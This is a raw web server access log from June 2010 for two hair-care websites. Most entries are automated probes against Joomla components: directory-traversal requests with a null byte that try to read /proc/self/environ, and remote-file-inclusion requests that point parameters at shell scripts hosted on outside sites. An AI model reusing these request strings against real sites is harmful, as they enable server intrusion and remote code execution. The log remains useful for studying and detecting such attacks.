188.40.37.133 - - [28/Jun/2010:08:23:14 -0700] "GET /logs/access_100412.log///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
64.34.165.224 - - [28/Jun/2010:08:24:07 -0700] "GET /logs/access.log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:24:08 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:24:08 -0700] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
206.71.53.4 - - [28/Jun/2010:08:24:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
206.71.53.4 - - [28/Jun/2010:08:24:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.34.165.224 - - [28/Jun/2010:08:24:45 -0700] "GET /logs/access.log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:24:46 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:08:24:46 -0700] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
66.129.109.12 - - [28/Jun/2010:08:24:49 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
66.129.109.12 - - [28/Jun/2010:08:24:49 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
66.129.109.12 - - [28/Jun/2010:08:24:49 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
64.22.67.37 - - [28/Jun/2010:08:25:22 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
85.130.111.126 - - [28/Jun/2010:08:25:23 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.130.111.126 - - [28/Jun/2010:08:25:24 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.130.111.126 - - [28/Jun/2010:08:25:26 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.129.109.12 - - [28/Jun/2010:08:25:46 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
206.71.53.4 - - [28/Jun/2010:08:26:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
206.71.53.4 - - [28/Jun/2010:08:26:09 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
91.124.23.200 - - [28/Jun/2010:08:26:48 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
91.124.23.200 - - [28/Jun/2010:08:26:49 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
208.115.111.248 - - [28/Jun/2010:08:26:52 -0700] "GET /logs/access_100215.log HTTP/1.1" 200 1900544 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:08:26:55 -0700] "GET /logs/access_100222.log HTTP/1.1" 200 1703936 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:08:27:00 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 1703936 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:27:28 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:27:28 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:27:28 -0700] "GET /logs/access_100607.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.22.67.37 - - [28/Jun/2010:08:27:33 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:27:50 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:27:50 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:27:50 -0700] "GET /logs/access_100607.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:28:01 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:08:28:01 -0700] "GET /logs/access.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:08:28:01 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:08:28:01 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:28:25 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:28:25 -0700] "GET /logs/access_100607.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:28:25 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:28:25 -0700] "GET /logs/access.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:08:28:25 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:08:28:25 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:08:28:25 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:28:30 -0700] "GET /logs/access_100607.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:28:30 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:28:33 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.22.67.37 - - [28/Jun/2010:08:29:12 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:08:29:13 -0700] "GET /logs/access_100510.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:29:13 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:08:29:13 -0700] "GET /logs/access.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:08:29:13 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:08:29:19 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:08:29:19 -0700] "GET /logs/access.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:08:29:19 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:08:29:19 -0700] "GET /logs/access_100510.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.juwelier-hanguel.de//admin/includes/sh/1.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.22.67.37 - - [28/Jun/2010:08:29:24 -0700] "GET /logs/access_100510.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.22.67.37 - - [28/Jun/2010:08:29:24 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.22.67.37 - - [28/Jun/2010:08:29:24 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.71.53.4 - - [28/Jun/2010:08:29:55 -0700] "GET /logs/access_100607.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
206.71.53.4 - - [28/Jun/2010:08:29:55 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
206.71.53.4 - - [28/Jun/2010:08:29:55 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:08:29:55 -0700] "GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
206.71.53.4 - - [28/Jun/2010:08:30:00 -0700] "GET /logs/access_100607.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
206.71.53.4 - - [28/Jun/2010:08:30:00 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
206.71.53.4 - - [28/Jun/2010:08:30:00 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:08:31:13 -0700] "GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
193.105.210.163 - - [28/Jun/2010:08:31:51 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)" "growlonghairfast.com"
193.105.210.163 - - [28/Jun/2010:08:31:51 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:08:31:56 -0700] "GET /logs/access.log//index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
89.238.72.218 - - [28/Jun/2010:08:31:56 -0700] "GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
89.238.72.218 - - [28/Jun/2010:08:31:56 -0700] "GET /logs//index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
206.71.53.4 - - [28/Jun/2010:08:32:01 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
206.71.53.4 - - [28/Jun/2010:08:32:05 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.150.189.35 - - [28/Jun/2010:08:32:23 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.150.189.35 - - [28/Jun/2010:08:32:24 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.150.189.35 - - [28/Jun/2010:08:32:24 -0700] "GET /logs/access_100322.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.223.63.220 - - [28/Jun/2010:08:32:37 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.251.189.204 - - [28/Jun/2010:08:32:43 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.251.189.204 - - [28/Jun/2010:08:32:43 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.251.189.204 - - [28/Jun/2010:08:32:43 -0700] "GET /logs/access_100322.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:08:33:41 -0700] "GET /logs/access.log//index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
89.238.72.218 - - [28/Jun/2010:08:33:41 -0700] "GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
89.238.72.218 - - [28/Jun/2010:08:33:41 -0700] "GET /logs//index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
67.228.107.2 - - [28/Jun/2010:08:35:07 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:35:07 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:35:08 -0700] "GET /logs/access_100607.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:35:08 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:35:08 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:35:09 -0700] "GET /logs/access_100607.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:08:35:12 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:08:35:12 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:08:35:16 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:08:35:16 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:08:35:21 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 2199574 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:35:22 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:35:25 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:35:42 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.228.107.2 - - [28/Jun/2010:08:35:43 -0700] "GET /logs/access.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.22.67.37 - - [28/Jun/2010:08:35:43 -0700] "GET /logs/access_100125.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.228.107.2 - - [28/Jun/2010:08:35:43 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.228.107.2 - - [28/Jun/2010:08:35:44 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.228.107.2 - - [28/Jun/2010:08:35:44 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.228.107.2 - - [28/Jun/2010:08:35:44 -0700] "GET /logs/access.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://our.anet.com//modules/1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.144.12.141 - - [28/Jun/2010:08:36:22 -0700] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
210.240.26.129 - - [28/Jun/2010:08:36:36 -0700] "GET /logs/access_100322.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.240.26.129 - - [28/Jun/2010:08:36:36 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.240.26.129 - - [28/Jun/2010:08:36:36 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.37.133 - - [28/Jun/2010:08:38:03 -0700] "GET /logs/access_100201.log///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
188.40.37.133 - - [28/Jun/2010:08:38:03 -0700] "GET //bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
188.40.37.133 - - [28/Jun/2010:08:38:03 -0700] "GET /logs///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:39:19 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:39:20 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:39:20 -0700] "GET /logs/access_100503.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:39:21 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:39:21 -0700] "GET /logs/access_100503.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
